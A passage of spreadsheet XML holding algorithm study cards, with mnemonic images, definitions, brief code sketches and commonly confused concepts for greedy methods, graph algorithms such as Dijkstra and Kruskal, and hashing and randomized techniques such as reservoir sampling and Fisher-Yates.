      <c r="F263" t="inlineStr">
        <is>
          <t>earliest-finishing meeting: some optimal schedule includes it / so taking it first loses nothing</t>
        </is>
      </c>
      <c r="G263" t="inlineStr">
        <is>
          <t>Optimal substructure - needed by BOTH DP and greedy; the greedy-choice property is the extra license to commit before solving subproblems.</t>
        </is>
      </c>
      <c r="H263" t="inlineStr">
        <is>
          <t>A guaranteed-safe first domino in some perfect chain.</t>
        </is>
      </c>
      <c r="J263" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K263" t="inlineStr">
        <is>
          <t>Greedy</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" t="n">
        <v>0</v>
      </c>
      <c r="B264" t="inlineStr">
        <is>
          <t>262</t>
        </is>
      </c>
      <c r="C264" t="inlineStr">
        <is>
          <t>Exchange argument</t>
        </is>
      </c>
      <c r="D264" t="inlineStr">
        <is>
          <t>A card sharp swapping cards in a rival's winning hand one at a time for his own picks, showing the score never drops - until the rival is holding the sharp's exact hand.</t>
        </is>
      </c>
      <c r="E264" t="inlineStr">
        <is>
          <t>Correctness proof: take any optimal solution, swap one of its choices for the greedy choice, show it gets no worse - repeat until it IS the greedy solution.</t>
        </is>
      </c>
      <c r="F264" t="inlineStr">
        <is>
          <t>optimal takes meeting X; greedy's G has end(G) &lt;= end(X) / swap X -&gt; G: still feasible, same count</t>
        </is>
      </c>
      <c r="G264" t="inlineStr">
        <is>
          <t>Greedy stays ahead - the other proof style: induction that greedy's partial solution always leads; exchange instead morphs an optimum into greedy's answer.</t>
        </is>
      </c>
      <c r="H264" t="inlineStr">
        <is>
          <t>Ship of Theseus rebuilt plank by plank into your ship.</t>
        </is>
      </c>
      <c r="J264" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K264" t="inlineStr">
        <is>
          <t>Greedy</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" t="n">
        <v>0</v>
      </c>
      <c r="B265" t="inlineStr">
        <is>
          <t>263</t>
        </is>
      </c>
      <c r="C265" t="inlineStr">
        <is>
          <t>Interval scheduling</t>
        </is>
      </c>
      <c r="D265" t="inlineStr">
        <is>
          <t>A conference-room clerk obsessed with EXITS: he books whichever meeting lets people leave soonest, freeing the room for the most future meetings. The clerk who sorts by start times books one all-day meeting and ruins everything.</t>
        </is>
      </c>
      <c r="E265" t="inlineStr">
        <is>
          <t>Pick the maximum number of non-overlapping intervals: always take the one ending earliest, discard overlaps; sort by END time, never start.</t>
        </is>
      </c>
      <c r="F265" t="inlineStr">
        <is>
          <t>ivs.sort(key=lambda iv: iv[1]) / for s, e in ivs: / if s &gt;= last_end: take; last_end = e</t>
        </is>
      </c>
      <c r="G265" t="inlineStr">
        <is>
          <t>Sorting by start or by shortest - both fail (one long early meeting can kill the day); ONLY earliest finish time is optimal.</t>
        </is>
      </c>
      <c r="H265" t="inlineStr">
        <is>
          <t>A speed-dating host maximizing dates via quickest goodbyes.</t>
        </is>
      </c>
      <c r="J265" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K265" t="inlineStr">
        <is>
          <t>Greedy</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" t="n">
        <v>0</v>
      </c>
      <c r="B266" t="inlineStr">
        <is>
          <t>264</t>
        </is>
      </c>
      <c r="C266" t="inlineStr">
        <is>
          <t>Huffman coding</t>
        </is>
      </c>
      <c r="D266" t="inlineStr">
        <is>
          <t>A charity gala where the two poorest guests must merge tables each round; by midnight the wallflowers sit up in the distant attic (long codes) while celebrities lounge by the front door (short codes).</t>
        </is>
      </c>
      <c r="E266" t="inlineStr">
        <is>
          <t>Optimal prefix-free code: repeatedly merge the two rarest symbols into a tree node; frequent symbols end near the root with short bit codes.</t>
        </is>
      </c>
      <c r="F266" t="inlineStr">
        <is>
          <t>heapify symbols by frequency / pop two rarest, merge into node, push the sum / repeat until one tree remains</t>
        </is>
      </c>
      <c r="G266" t="inlineStr">
        <is>
          <t>Fixed-length codes like ASCII - Huffman varies length by frequency; prefix-free means no code prefixes another, so decoding never backtracks.</t>
        </is>
      </c>
      <c r="H266" t="inlineStr">
        <is>
          <t>Morse code: E is a single dot because E is everywhere.</t>
        </is>
      </c>
      <c r="J266" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K266" t="inlineStr">
        <is>
          <t>Greedy</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" t="n">
        <v>0</v>
      </c>
      <c r="B267" t="inlineStr">
        <is>
          <t>265</t>
        </is>
      </c>
      <c r="C267" t="inlineStr">
        <is>
          <t>Fractional knapsack</t>
        </is>
      </c>
      <c r="D267" t="inlineStr">
        <is>
          <t>A smuggler with barrels of saffron, honey, and sand and one duffel bag: she scoops the priciest-per-kilo powder first and slices the final scoop with a knife - nothing sacred about whole barrels.</t>
        </is>
      </c>
      <c r="E267" t="inlineStr">
        <is>
          <t>When items can be split, greed by value-per-weight is optimal: pour in the densest goods first and top off with a fraction of the last item.</t>
        </is>
      </c>
      <c r="F267" t="inlineStr">
        <is>
          <t>items.sort(key=lambda i: i.val / i.wt, reverse=True) / fill greedily; split the item that overflows</t>
        </is>
      </c>
      <c r="G267" t="inlineStr">
        <is>
          <t>0/1 knapsack - indivisible items break the greedy (a dense tiny item can block better combos); 0/1 needs DP.</t>
        </is>
      </c>
      <c r="H267" t="inlineStr">
        <is>
          <t>A juice bar filling one cup starting from the priciest nectar.</t>
        </is>
      </c>
      <c r="J267" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K267" t="inlineStr">
        <is>
          <t>Greedy</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" t="n">
        <v>0</v>
      </c>
      <c r="B268" t="inlineStr">
        <is>
          <t>266</t>
        </is>
      </c>
      <c r="C268" t="inlineStr">
        <is>
          <t>Greedy coin-change failure</t>
        </is>
      </c>
      <c r="D268" t="inlineStr">
        <is>
          <t>A proud cashier in the Kingdom of 1-3-4 pennies slaps down the big 4 for a 6-cent sale, then fumbles two more coins - while the customer holds up two shiny 3s and smirks.</t>
        </is>
      </c>
      <c r="E268" t="inlineStr">
        <is>
          <t>Greedy 'largest coin first' works for canonical systems (US coins) but fails in general: with coins {1,3,4}, greedy makes 6 as 4+1+1; optimal is 3+3.</t>
        </is>
      </c>
      <c r="F268" t="inlineStr">
        <is>
          <t>coins {1,3,4}, amount 6 / greedy: 4+1+1 (3 coins) / optimal: 3+3 (2 coins)</t>
        </is>
      </c>
      <c r="G268" t="inlineStr">
        <is>
          <t>US/EUR coins working greedily - canonical systems are the lucky special case; never generalize from them. DP handles any coin set.</t>
        </is>
      </c>
      <c r="H268" t="inlineStr">
        <is>
          <t>Britain's pre-decimal coinage chaos.</t>
        </is>
      </c>
      <c r="J268" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K268" t="inlineStr">
        <is>
          <t>Greedy</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" t="n">
        <v>0</v>
      </c>
      <c r="B269" t="inlineStr">
        <is>
          <t>267</t>
        </is>
      </c>
      <c r="C269" t="inlineStr">
        <is>
          <t>Local vs global optimum</t>
        </is>
      </c>
      <c r="D269" t="inlineStr">
        <is>
          <t>A fog-blind climber who only ever steps uphill plants a victory flag on a grassy foothill - while Everest glowers unseen across a valley he refuses to descend into.</t>
        </is>
      </c>
      <c r="E269" t="inlineStr">
        <is>
          <t>A locally optimal point beats all its neighbors yet may sit far below the global best; greedy and hill climbing can strand you on a foothill.</t>
        </is>
      </c>
      <c r="F269" t="inlineStr">
        <is>
          <t>hill climbing: stuck where every neighbor is worse / escapes: random restarts, simulated annealing</t>
        </is>
      </c>
      <c r="G269" t="inlineStr">
        <is>
          <t>Convex problems - there local IS global (why gradient descent works); greedy's danger lives in non-convex landscapes.</t>
        </is>
      </c>
      <c r="H269" t="inlineStr">
        <is>
          <t>A maze rat hugging the wall in a maze with an island.</t>
        </is>
      </c>
      <c r="J269" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K269" t="inlineStr">
        <is>
          <t>Greedy</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" t="n">
        <v>0</v>
      </c>
      <c r="B270" t="inlineStr">
        <is>
          <t>268</t>
        </is>
      </c>
      <c r="C270" t="inlineStr">
        <is>
          <t>When greedy fails</t>
        </is>
      </c>
      <c r="D270" t="inlineStr">
        <is>
          <t>A speed-chess champ who always grabs the biggest capturable piece: bishop bait, then boom - back-rank mate. Flashy grabs, lost games; the slow player calculating whole lines wins.</t>
        </is>
      </c>
      <c r="E270" t="inlineStr">
        <is>
          <t>If a locally best choice can forfeit a better global combination, greedy breaks - hunt small counterexamples; overlap plus tradeoffs usually means DP.</t>
        </is>
      </c>
      <c r="F270" t="inlineStr">
        <is>
          <t>greedy fails: 0/1 knapsack, coins {1,3,4}, LIS / greedy provably wins: interval count, Huffman, MST</t>
        </is>
      </c>
      <c r="G270" t="inlineStr">
        <is>
          <t>Heuristic greedy - greedy is still a fine APPROXIMATION when proofs fail; the sin is calling an unproven greedy exact.</t>
        </is>
      </c>
      <c r="H270" t="inlineStr">
        <is>
          <t>Piece-grabber vs positional player.</t>
        </is>
      </c>
      <c r="J270" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K270" t="inlineStr">
        <is>
          <t>Greedy</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" t="n">
        <v>0</v>
      </c>
      <c r="B271" t="inlineStr">
        <is>
          <t>269</t>
        </is>
      </c>
      <c r="C271" t="inlineStr">
        <is>
          <t>Greedy stays ahead</t>
        </is>
      </c>
      <c r="D271" t="inlineStr">
        <is>
          <t>A marathon pacer who at EVERY mile marker is level with or ahead of the record ghost-runner; if he never trails at any marker, the ghost cannot beat him at the tape.</t>
        </is>
      </c>
      <c r="E271" t="inlineStr">
        <is>
          <t>Proof by induction that after every step greedy's partial solution is at least as advanced as any rival's - so at the end it cannot be beaten.</t>
        </is>
      </c>
      <c r="F271" t="inlineStr">
        <is>
          <t>claim: greedy's i-th meeting ends &lt;= optimal's i-th / induct on i =&gt; greedy fits at least as many meetings</t>
        </is>
      </c>
      <c r="G271" t="inlineStr">
        <is>
          <t>Exchange argument - transforms an optimal solution INTO greedy's; stays-ahead never touches the optimum, it just races it marker by marker.</t>
        </is>
      </c>
      <c r="H271" t="inlineStr">
        <is>
          <t>A tortoise holding the lead at every checkpoint.</t>
        </is>
      </c>
      <c r="J271" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K271" t="inlineStr">
        <is>
          <t>Greedy</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" t="n">
        <v>0</v>
      </c>
      <c r="B272" t="inlineStr">
        <is>
          <t>270</t>
        </is>
      </c>
      <c r="C272" t="inlineStr">
        <is>
          <t>Breadth-first search</t>
        </is>
      </c>
      <c r="D272" t="inlineStr">
        <is>
          <t>A stone dropped in a pond: perfect rings ripple outward, soaking the distance-1 lilies, then distance-2 - every lily is first touched by its shortest ripple.</t>
        </is>
      </c>
      <c r="E272" t="inlineStr">
        <is>
          <t>Explore level by level with a queue; each node is first reached along a fewest-edges path, giving shortest paths in unweighted graphs.</t>
        </is>
      </c>
      <c r="F272" t="inlineStr">
        <is>
          <t>q = deque([s]); dist = {s: 0} / # pop left; push unseen neighbors with dist+1 / # first arrival = fewest edges</t>
        </is>
      </c>
      <c r="G272" t="inlineStr">
        <is>
          <t>DFS - swap the queue for a stack and you dive deep instead of rippling wide; only BFS gives unweighted shortest paths.</t>
        </is>
      </c>
      <c r="H272" t="inlineStr">
        <is>
          <t>A zombie outbreak spreading exactly one block per night.</t>
        </is>
      </c>
      <c r="J272" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K272" t="inlineStr">
        <is>
          <t>Graph algorithms</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" t="n">
        <v>0</v>
      </c>
      <c r="B273" t="inlineStr">
        <is>
          <t>271</t>
        </is>
      </c>
      <c r="C273" t="inlineStr">
        <is>
          <t>Depth-first search</t>
        </is>
      </c>
      <c r="D273" t="inlineStr">
        <is>
          <t>A spelunker on a rope: plunges down every tunnel to its dead end, climbs back to the last junction, takes the next fork - chalk-marking the whole cave in one continuous crawl.</t>
        </is>
      </c>
      <c r="E273" t="inlineStr">
        <is>
          <t>Follow one path as deep as possible, backtracking when stuck (stack or recursion); discovery and finish times power cycle detection and topo sort.</t>
        </is>
      </c>
      <c r="F273" t="inlineStr">
        <is>
          <t>def dfs(v): / seen.add(v) / [dfs(u) for u in adj[v] if u not in seen]</t>
        </is>
      </c>
      <c r="G273" t="inlineStr">
        <is>
          <t>BFS - DFS goes deep with O(depth) memory and rich edge classification; BFS goes wide with O(frontier) memory and shortest paths.</t>
        </is>
      </c>
      <c r="H273" t="inlineStr">
        <is>
          <t>A corn maze walked with one hand always on the wall.</t>
        </is>
      </c>
      <c r="J273" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K273" t="inlineStr">
        <is>
          <t>Graph algorithms</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" t="n">
        <v>0</v>
      </c>
      <c r="B274" t="inlineStr">
        <is>
          <t>272</t>
        </is>
      </c>
      <c r="C274" t="inlineStr">
        <is>
          <t>Dijkstra's algorithm</t>
        </is>
      </c>
      <c r="D274" t="inlineStr">
        <is>
          <t>DYE-kstra: colored dye pumped into the source of a pipe network spreads at constant speed; each junction is stamped 'settled' the instant dye first touches it - no later trickle can ever beat that moment.</t>
        </is>
      </c>
      <c r="E274" t="inlineStr">
        <is>
          <t>Shortest paths from a source with NON-NEGATIVE weights: a min-heap repeatedly settles the closest unsettled node and relaxes its edges; O((V+E) log V).</t>
        </is>
      </c>
      <c r="F274" t="inlineStr">
        <is>
          <t>push (0, s) / pop (d, v); skip if settled; settle v / for u, w in adj[v]: push (d + w, u)</t>
        </is>
      </c>
      <c r="G274" t="inlineStr">
        <is>
          <t>Bellman-Ford - Dijkstra's settled-means-final logic breaks on negative edges; Bellman-Ford survives them at O(VE).</t>
        </is>
      </c>
      <c r="H274" t="inlineStr">
        <is>
          <t>A wildfire front where distance equals burn time.</t>
        </is>
      </c>
      <c r="J274" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K274" t="inlineStr">
        <is>
          <t>Graph algorithms</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" t="n">
        <v>0</v>
      </c>
      <c r="B275" t="inlineStr">
        <is>
          <t>273</t>
        </is>
      </c>
      <c r="C275" t="inlineStr">
        <is>
          <t>Bellman-Ford algorithm</t>
        </is>
      </c>
      <c r="D275" t="inlineStr">
        <is>
          <t>A patient bellman ringing every doorbell on every street for V-1 nights straight; if news still improves on night V, someone is running a money-printing loop - sound the negative-cycle alarm.</t>
        </is>
      </c>
      <c r="E275" t="inlineStr">
        <is>
          <t>Relax EVERY edge V-1 times; handles negative weights and detects negative cycles (any improvement on pass V); O(VE) - slower but tougher than Dijkstra.</t>
        </is>
      </c>
      <c r="F275" t="inlineStr">
        <is>
          <t>for _ in range(V - 1): / for u, v, w in edges: / dist[v] = min(dist[v], dist[u] + w)</t>
        </is>
      </c>
      <c r="G275" t="inlineStr">
        <is>
          <t>Dijkstra - greedy and fast but banned on negative edges; Bellman-Ford's brute relaxation also certifies negative cycles.</t>
        </is>
      </c>
      <c r="H275" t="inlineStr">
        <is>
          <t>Currency arbitrage detection via negative log-rate cycles.</t>
        </is>
      </c>
      <c r="J275" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K275" t="inlineStr">
        <is>
          <t>Graph algorithms</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" t="n">
        <v>0</v>
      </c>
      <c r="B276" t="inlineStr">
        <is>
          <t>274</t>
        </is>
      </c>
      <c r="C276" t="inlineStr">
        <is>
          <t>A* search</t>
        </is>
      </c>
      <c r="D276" t="inlineStr">
        <is>
          <t>A hiker with a crow-flies GPS readout: she weighs miles-walked plus straight-line-miles-left and always steps toward the smallest total - an optimist's estimate that never lies on the high side.</t>
        </is>
      </c>
      <c r="E276" t="inlineStr">
        <is>
          <t>Dijkstra guided by a heuristic: expand lowest f = g (cost so far) + h (estimate to goal); admissible h (never overestimates) keeps the result optimal.</t>
        </is>
      </c>
      <c r="F276" t="inlineStr">
        <is>
          <t>f = g[v] + h(v) # h = straight-line distance / heappush(open_set, (f, v)) / # h = 0 -&gt; plain Dijkstra</t>
        </is>
      </c>
      <c r="G276" t="inlineStr">
        <is>
          <t>Dijkstra - exactly A* with h = 0; a good admissible h slashes the explored region, an overestimating h can return suboptimal paths.</t>
        </is>
      </c>
      <c r="H276" t="inlineStr">
        <is>
          <t>A homing pigeon wearing an odometer.</t>
        </is>
      </c>
      <c r="J276" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K276" t="inlineStr">
        <is>
          <t>Graph algorithms</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" t="n">
        <v>0</v>
      </c>
      <c r="B277" t="inlineStr">
        <is>
          <t>275</t>
        </is>
      </c>
      <c r="C277" t="inlineStr">
        <is>
          <t>Topological sort</t>
        </is>
      </c>
      <c r="D277" t="inlineStr">
        <is>
          <t>A strict valet dressing you: he only hands over garments with no pending prerequisites - socks before shoes, shirt before tie. If every remaining garment awaits another, your wardrobe has a cycle and you go naked.</t>
        </is>
      </c>
      <c r="E277" t="inlineStr">
        <is>
          <t>Linear order of a DAG with every edge pointing forward; Kahn's: repeatedly emit a zero in-degree node and decrement its neighbors - leftovers mean a cycle.</t>
        </is>
      </c>
      <c r="F277" t="inlineStr">
        <is>
          <t>q = [v for v in V if indeg[v] == 0] / pop v, emit it; decrement indeg of neighbors / append any neighbor hitting zero</t>
        </is>
      </c>
      <c r="G277" t="inlineStr">
        <is>
          <t>DFS-based topo sort - the other method: reverse order of DFS finish times; both refuse (by design) to order cyclic graphs.</t>
        </is>
      </c>
      <c r="H277" t="inlineStr">
        <is>
          <t>Course prerequisites chart; make's build order.</t>
        </is>
      </c>
      <c r="J277" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K277" t="inlineStr">
        <is>
          <t>Graph algorithms</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" t="n">
        <v>0</v>
      </c>
      <c r="B278" t="inlineStr">
        <is>
          <t>276</t>
        </is>
      </c>
      <c r="C278" t="inlineStr">
        <is>
          <t>Cycle detection</t>
        </is>
      </c>
      <c r="D278" t="inlineStr">
        <is>
          <t>A detective marking doors white, gray, black while trailing suspects: stumbling onto a GRAY door - someone he is STILL tailing - means the trail loops back on itself. Conspiracy ring confirmed.</t>
        </is>
      </c>
      <c r="E278" t="inlineStr">
        <is>
          <t>Directed: DFS coloring - an edge into a gray (in-progress) node is a cycle; undirected: any visited neighbor besides your parent, or union-find.</t>
        </is>
      </c>
      <c r="F278" t="inlineStr">
        <is>
          <t>WHITE unvisited, GRAY on stack, BLACK done / edge into a GRAY node =&gt; directed cycle</t>
        </is>
      </c>
      <c r="G278" t="inlineStr">
        <is>
          <t>Undirected vs directed tests - undirected 'visited neighbor' counts only if it isn't the parent; directed needs the gray/on-stack test, not mere visited.</t>
        </is>
      </c>
      <c r="H278" t="inlineStr">
        <is>
          <t>Floyd's tortoise and hare for linked-list cycles.</t>
        </is>
      </c>
      <c r="J278" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K278" t="inlineStr">
        <is>
          <t>Graph algorithms</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" t="n">
        <v>0</v>
      </c>
      <c r="B279" t="inlineStr">
        <is>
          <t>277</t>
        </is>
      </c>
      <c r="C279" t="inlineStr">
        <is>
          <t>Kruskal's algorithm</t>
        </is>
      </c>
      <c r="D279" t="inlineStr">
        <is>
          <t>A thrifty kingdom uniting villages by always building the CHEAPEST unbuilt bridge anywhere on the map - skipping any bridge whose two villages already share roads, per the union-find clerk's ledger.</t>
        </is>
      </c>
      <c r="E279" t="inlineStr">
        <is>
          <t>MST by global greed: sort all edges by weight, add each unless it closes a cycle (union-find check); a forest merges into one tree; O(E log E).</t>
        </is>
      </c>
      <c r="F279" t="inlineStr">
        <is>
          <t>for w, u, v in sorted(edges): / if find(u) != find(v): / union(u, v); mst.append((u, v))</t>
        </is>
      </c>
      <c r="G279" t="inlineStr">
        <is>
          <t>Prim - Kruskal grows a scattered forest edge-by-edge with union-find; Prim grows ONE connected tree outward with a heap.</t>
        </is>
      </c>
      <c r="H279" t="inlineStr">
        <is>
          <t>Bargain-bin shopping under a no-duplicate-connection rule.</t>
        </is>
      </c>
      <c r="J279" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K279" t="inlineStr">
        <is>
          <t>Graph algorithms</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" t="n">
        <v>0</v>
      </c>
      <c r="B280" t="inlineStr">
        <is>
          <t>278</t>
        </is>
      </c>
      <c r="C280" t="inlineStr">
        <is>
          <t>Prim's algorithm</t>
        </is>
      </c>
      <c r="D280" t="inlineStr">
        <is>
          <t>A crystal seed in a mineral bath: the crystal always grows along the cheapest facet touching its own surface, one prim polished face at a time, until it engulfs every node.</t>
        </is>
      </c>
      <c r="E280" t="inlineStr">
        <is>
          <t>MST by local growth: start anywhere and repeatedly attach the cheapest edge leaving the current tree, tracked with a min-heap; O(E log V).</t>
        </is>
      </c>
      <c r="F280" t="inlineStr">
        <is>
          <t>push start's edges; pop cheapest (w, u, v) / if v is new: add edge, push v's edges</t>
        </is>
      </c>
      <c r="G280" t="inlineStr">
        <is>
          <t>Dijkstra - the same heap dance with a different key: Prim keys on the single edge weight into the tree; Dijkstra keys on total distance from the source.</t>
        </is>
      </c>
      <c r="H280" t="inlineStr">
        <is>
          <t>Prim and proper: only ever extend your own tidy tree.</t>
        </is>
      </c>
      <c r="J280" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K280" t="inlineStr">
        <is>
          <t>Graph algorithms</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" t="n">
        <v>0</v>
      </c>
      <c r="B281" t="inlineStr">
        <is>
          <t>279</t>
        </is>
      </c>
      <c r="C281" t="inlineStr">
        <is>
          <t>Floyd-Warshall algorithm</t>
        </is>
      </c>
      <c r="D281" t="inlineStr">
        <is>
          <t>An airline opening hub airports one at a time: each time hub k opens, every city pair asks 'is connecting through k cheaper than our current fare?' Once all hubs open, every fare is perfect.</t>
        </is>
      </c>
      <c r="E281" t="inlineStr">
        <is>
          <t>All-pairs shortest paths: for each intermediate k, d[i][j] = min(d[i][j], d[i][k] + d[k][j]); O(V^3), negative edges fine, k loop OUTERMOST.</t>
        </is>
      </c>
      <c r="F281" t="inlineStr">
        <is>
          <t>for k in range(V): / for i in range(V): / for j in range(V): d[i][j] = min(d[i][j], d[i][k] + d[k][j])</t>
        </is>
      </c>
      <c r="G281" t="inlineStr">
        <is>
          <t>Dijkstra per source - faster on sparse graphs; Floyd-Warshall wins dense or tiny-V cases. Classic bug: putting k anywhere but the outer loop.</t>
        </is>
      </c>
      <c r="H281" t="inlineStr">
        <is>
          <t>Gossip closure: shortest rumor path through middleman k.</t>
        </is>
      </c>
      <c r="J281" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K281" t="inlineStr">
        <is>
          <t>Graph algorithms</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" t="n">
        <v>0</v>
      </c>
      <c r="B282" t="inlineStr">
        <is>
          <t>280</t>
        </is>
      </c>
      <c r="C282" t="inlineStr">
        <is>
          <t>Good hash function</t>
        </is>
      </c>
      <c r="D282" t="inlineStr">
        <is>
          <t>An industrial paint shaker: twin cans in, twin colors out, every time; nudge one pigment drop and the whole can leaps to a wildly different hue - cans landing evenly across all shelves.</t>
        </is>
      </c>
      <c r="E282" t="inlineStr">
        <is>
          <t>Deterministic, fast, uniform: equal inputs hash equal, outputs spread evenly across buckets, and tiny input changes flip about half the bits (avalanche).</t>
        </is>
      </c>
      <c r="F282" t="inlineStr">
        <is>
          <t>hash('cat') == hash('cat') # deterministic / hash('cat') vs hash('cats'): unrelated values</t>
        </is>
      </c>
      <c r="G282" t="inlineStr">
        <is>
          <t>Cryptographic hash - adds preimage and collision resistance against adversaries; table hashing only needs speed plus uniformity.</t>
        </is>
      </c>
      <c r="H282" t="inlineStr">
        <is>
          <t>A blender: same smoothie for same fruits, chaos from one extra berry.</t>
        </is>
      </c>
      <c r="J282" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K282" t="inlineStr">
        <is>
          <t>Hashing &amp; randomized</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" t="n">
        <v>0</v>
      </c>
      <c r="B283" t="inlineStr">
        <is>
          <t>281</t>
        </is>
      </c>
      <c r="C283" t="inlineStr">
        <is>
          <t>Rabin-Karp rolling hash</t>
        </is>
      </c>
      <c r="D283" t="inlineStr">
        <is>
          <t>A tour bus headcount: when the bus rolls one house forward, the driver subtracts the rider hopping off the back, everyone slides a seat, one boards the front - fingerprint updated without recounting.</t>
        </is>
      </c>
      <c r="E283" t="inlineStr">
        <is>
          <t>Substring search: hash each length-m window in O(1) by rolling - drop the exiting char, shift by the base, add the entrant; verify real matches on hash hits.</t>
        </is>
      </c>
      <c r="F283" t="inlineStr">
        <is>
          <t>h = (h - ord(s[i]) * B**(m-1)) * B + ord(s[i+m]) / if h == pattern_hash: verify the slice</t>
        </is>
      </c>
      <c r="G283" t="inlineStr">
        <is>
          <t>Naive substring search - recomputes each window in O(m); rolling is O(1) per slide, but collisions demand a verification step.</t>
        </is>
      </c>
      <c r="H283" t="inlineStr">
        <is>
          <t>An odometer updating rather than recounting the miles.</t>
        </is>
      </c>
      <c r="J283" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K283" t="inlineStr">
        <is>
          <t>Hashing &amp; randomized</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" t="n">
        <v>0</v>
      </c>
      <c r="B284" t="inlineStr">
        <is>
          <t>282</t>
        </is>
      </c>
      <c r="C284" t="inlineStr">
        <is>
          <t>Reservoir sampling</t>
        </is>
      </c>
      <c r="D284" t="inlineStr">
        <is>
          <t>A lifeboat with k seats beside an endless parade of swimmers: swimmer i wins a seat with odds k/i, shoving a random seated soul overboard - and miraculously everyone ends equally likely aboard.</t>
        </is>
      </c>
      <c r="E284" t="inlineStr">
        <is>
          <t>Pick k uniform samples from a stream of unknown length in one pass: keep the first k, then accept item i with probability k/i, evicting a random resident.</t>
        </is>
      </c>
      <c r="F284" t="inlineStr">
        <is>
          <t>for i, x in enumerate(stream, 1): / if i &lt;= k: res.append(x) / elif random.random() &lt; k / i: res[random.randrange(k)] = x</t>
        </is>
      </c>
      <c r="G284" t="inlineStr">
        <is>
          <t>random.sample - needs the whole population in memory with known length; reservoir works one-pass over unbounded streams.</t>
        </is>
      </c>
      <c r="H284" t="inlineStr">
        <is>
          <t>A radio contest where caller n dethrones a winner with fading odds.</t>
        </is>
      </c>
      <c r="J284" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K284" t="inlineStr">
        <is>
          <t>Hashing &amp; randomized</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" t="n">
        <v>0</v>
      </c>
      <c r="B285" t="inlineStr">
        <is>
          <t>283</t>
        </is>
      </c>
      <c r="C285" t="inlineStr">
        <is>
          <t>Fisher-Yates shuffle</t>
        </is>
      </c>
      <c r="D285" t="inlineStr">
        <is>
          <t>Fisher nets one random fish from the shrinking barrel and freezes it against the barrel's back wall; the frozen row grows, the swimming pool shrinks - an honest shuffle, fish by fish.</t>
        </is>
      </c>
      <c r="E285" t="inlineStr">
        <is>
          <t>Uniform in-place shuffle: walk i from the end, swapping a[i] with a[j] for random j &lt;= i; every permutation equally likely, O(n).</t>
        </is>
      </c>
      <c r="F285" t="inlineStr">
        <is>
          <t>for i in range(n - 1, 0, -1): / j = random.randint(0, i) / a[i], a[j] = a[j], a[i]</t>
        </is>
      </c>
      <c r="G285" t="inlineStr">
        <is>
          <t>Naive shuffle with j in [0, n) each step - biased: n^n outcomes cannot divide evenly into n! permutations; j must stay in the unshuffled prefix.</t>
        </is>
      </c>
      <c r="H285" t="inlineStr">
        <is>
          <t>sort(key=random) - also biased in some implementations, and O(n log n).</t>
        </is>
      </c>
      <c r="J285" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K285" t="inlineStr">
        <is>
          <t>Hashing &amp; randomized</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" t="n">
        <v>0</v>
      </c>
      <c r="B286" t="inlineStr">
        <is>
          <t>284</t>
        </is>
      </c>
      <c r="C286" t="inlineStr">
        <is>
          <t>Monte Carlo vs Las Vegas</t>
        </is>
      </c>
      <c r="D286" t="inlineStr">
        <is>
